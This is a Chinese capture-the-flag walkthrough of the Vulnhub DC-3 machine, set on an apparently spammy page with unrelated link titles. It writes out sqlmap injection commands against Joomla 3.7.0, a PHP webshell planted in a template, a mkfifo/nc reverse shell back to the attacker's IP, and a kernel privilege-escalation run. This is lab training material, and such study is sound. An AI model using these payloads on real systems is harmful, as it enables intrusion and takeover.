当前位置: 首页 > news >正文

鹤壁做网站公司电话网络方案分析

鹤壁做网站公司电话,网络方案分析,网站建设优化服务好么,南宁百度seo排名joomla3.7.0的提权 信息收集 靶机IP:192.168.20.136 kaliIP:192.168.20.128 网络有问题的可以看下搭建Vulnhub靶机网络问题(获取不到IP) 首先nmap扫端口和版本#xff0c;dirsearch跑下目录#xff0c;wappalyzer也可以用下 发现服务器用的ubuntu#xff0c;JoomlaCMS…joomla3.7.0的提权 信息收集 靶机IP:192.168.20.136 kaliIP:192.168.20.128 网络有问题的可以看下搭建Vulnhub靶机网络问题(获取不到IP) 首先nmap扫端口和版本dirsearch跑下目录wappalyzer也可以用下 发现服务器用的ubuntuJoomlaCMS等信息。 还有个admin敏感目录这个是joomla后台界面。 漏洞利用 考虑Joomla漏洞 有专门针对Joomla的漏扫工具joomscan kali apt install joomscan下载 joomscan -u 192.168.20.136得到joomla的版本3.7.0 去searchsploit看看有没有对应版本的漏洞 看到一个sql注入漏洞 去目录查看txt/usr/share/exploitdb/exploits/php/webapps 给出了我们注入点和sqlmap命令正常拿后台密码 查看数据库 sqlmap -u http://192.168.20.136/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent -p list[fullordering] --batch --dbs 查看joomladb的表 sqlmap -u http://192.168.20.136/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent -p list[fullordering] -D joomladb --tables 查看users表的列 sqlmap -u http://192.168.20.136/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent -p list[fullordering] --columns -T #__users -D joomladb 取值 sqlmap -u http://192.168.20.136/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent -p list[fullordering] --dump -C username,password -T #__users -D joomladb 拿到admin的密码不过是加密的观察密文特征搜素joomla3.7.0的加密方式发现为crypt()这里可以用hashcat和john字典解密。 hashcat使用教程 hashcat -a 0 -m 3200 source.txt rockyou.txt source.txt中存的是密文 john 拿到admin后台密码snoopy注意去后台路径登录 这里有两种方式一种是上传语言包我这里下载语言包界面没东西详情见joomla上传语言包提权 第二种是修改joom网站提权我们可以直接编辑网站的源码。 我们选择beez3模板在index.php中直接加入一句话木马?php $sl create_function(, $_REQUEST[klion]); $sl(); ? 注意在Style中把default界面设置为beez3 之后用蚁剑链接的时候要注意这个后台界面解析不了首页的php我们要打开网站的首页已经变为beez3模板 拿蚁剑连接 提权 ubuntu版本漏洞 lsb_release -a uname -a查看版本 searchsploit 查找版本漏洞 去URL中找EXP下载在攻击机用python3 -m http.server 4444 开启一个简单http服务器。 wget http://192.168.20.128:4444/39772.zip 之后根据URL教程去执行就好 我这蚁剑出了个问题一直提权失败之后用nc反弹shell到kali才提权成功了。 这个靶机nc没有-e参数用不了nc -e /bin/sh 192.168.20.128 6666 要用rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 21|nc 192.168.20.128 6666 /tmp/f 提权部分过程find 输出太多留下有用部分了 ┌──(root㉿kali)-[/home/kali/Desktop/DC-3] └─# nc -lvp 6666 listening on [any] 6666 ... 192.168.20.136: inverse host lookup failed: Host name lookup failure connect to [192.168.20.128] from (UNKNOWN) [192.168.20.136] 54684 /bin/sh: 0: cant access tty; job control turned off $ ls 39772 39772.zip 44300.zip LICENSE.txt README.txt __MACOSX administrator bin cache cli components configuration.php decr decr.c htaccess.txt images includes index.php language layouts libraries media modules plugins pwn pwn.c robots.txt.dist templates tmp web.config.txt $ cd 39772 $ ls crasher.tar ebpf_mapfd_doubleput_exploit exploit.tar $ cd ebpf_mapfd_doubleput_exploit $ ls compile.sh doubleput doubleput.c fuse_mount hello hello.c suidhelper suidhelper.c $ ./compile.sh doubleput.c: In function make_setuid: doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast].insns (__aligned_u64) insns,^ doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast].license (__aligned_u64)^ $ ./doubleput fuse: mountpoint is not empty fuse: if you are sure this is safe, use the nonempty mount option doubleput: system() failed doubleput: child quit before we got a good file* suid file detected, launching rootshell... we have root privs now...id uid0(root) gid0(root) groups0(root),33(www-data) find / -name *flag* /root/the-flag.txt /proc/sys/kernel/acpi_video_flags /proc/kpageflags /usr/lib/i386-linux-gnu/perl/5.22.1/bits/waitflags.phls compile.sh doubleput doubleput.c fuse_mount hello hello.c suidhelper suidhelper.c cd /root ls the-flag.txt cat the-flag.txt__ __ _ _ ____ _ _ _ _ \ \ / /__| | | | _ \ ___ _ __ ___| | | | |\ \ /\ / / _ \ | | | | | |/ _ \| _ \ / _ \ | | | |\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)Congratulations are in order. :-)I hope youve enjoyed this challenge as I enjoyed making it.If there are any ways that I can improve these little challenges, please let me know.As per usual, comments and complaints can be sent via Twitter to DCAU7Have a great day!!!!
http://www.dnsts.com.cn/news/146942.html

相关文章:

  • 怎么给网站做seo网站建设时关键词要怎么选呢
  • 企业做网站价格wordpress搭建知识库
  • 义乌网站建设怎么做好邵阳网站建设设计
  • 软件开发 网站开发公司网页设计与网站建设入门到精通
  • 建设银行纪检监察网站首页wordpress 微信 商城
  • 咋制作网站湖州小程序开发
  • 企业网站怎么查wordpress怎么设置页面导航
  • 护肤品网站建设wordpress原图片删除
  • 三站合一的网站怎么做石家庄区号
  • 网站首页的动态视频怎么做的在线赚钱平台
  • 如何优化网站导航动漫设计专业主要学什么
  • 网站绑定多个域名网站建设方案封面
  • 学校网站查询个人信息iis7 发布静态网站
  • 交互式网站定义网站建设内容介绍
  • 免费网站服务器安全软件下载公共场所建设网站
  • 环保网站设计价格做竞猜网站合法吗
  • 东莞美容网站建设免费制作图片生成器
  • 网站内容一样影响收录iis装网站
  • 网页设计网站官网昌邑网页定制
  • 医院门户网站模板七牛sdk wordpress
  • 网站建设实训实训心得一个微信公众号可以做几个网站
  • 推荐网站制作建设书二维码生成器工具
  • 平江网站建设苏州优化网站公司
  • 技术支持 金华网站建设常州网站推广招聘
  • 大学《网站开发与应用》试题服务专业的建网站公司电话
  • 建设一个微商的网站网站免费获取验证码怎么做
  • 欧美平面设计网站狼雨seo网站
  • 专业网站设计软件工具公司网站建设的系统功能需求分析
  • 电商网站开发平台一哈尔滨网站建设公司
  • 网站店铺vr场景可以做吗18种网络营销方式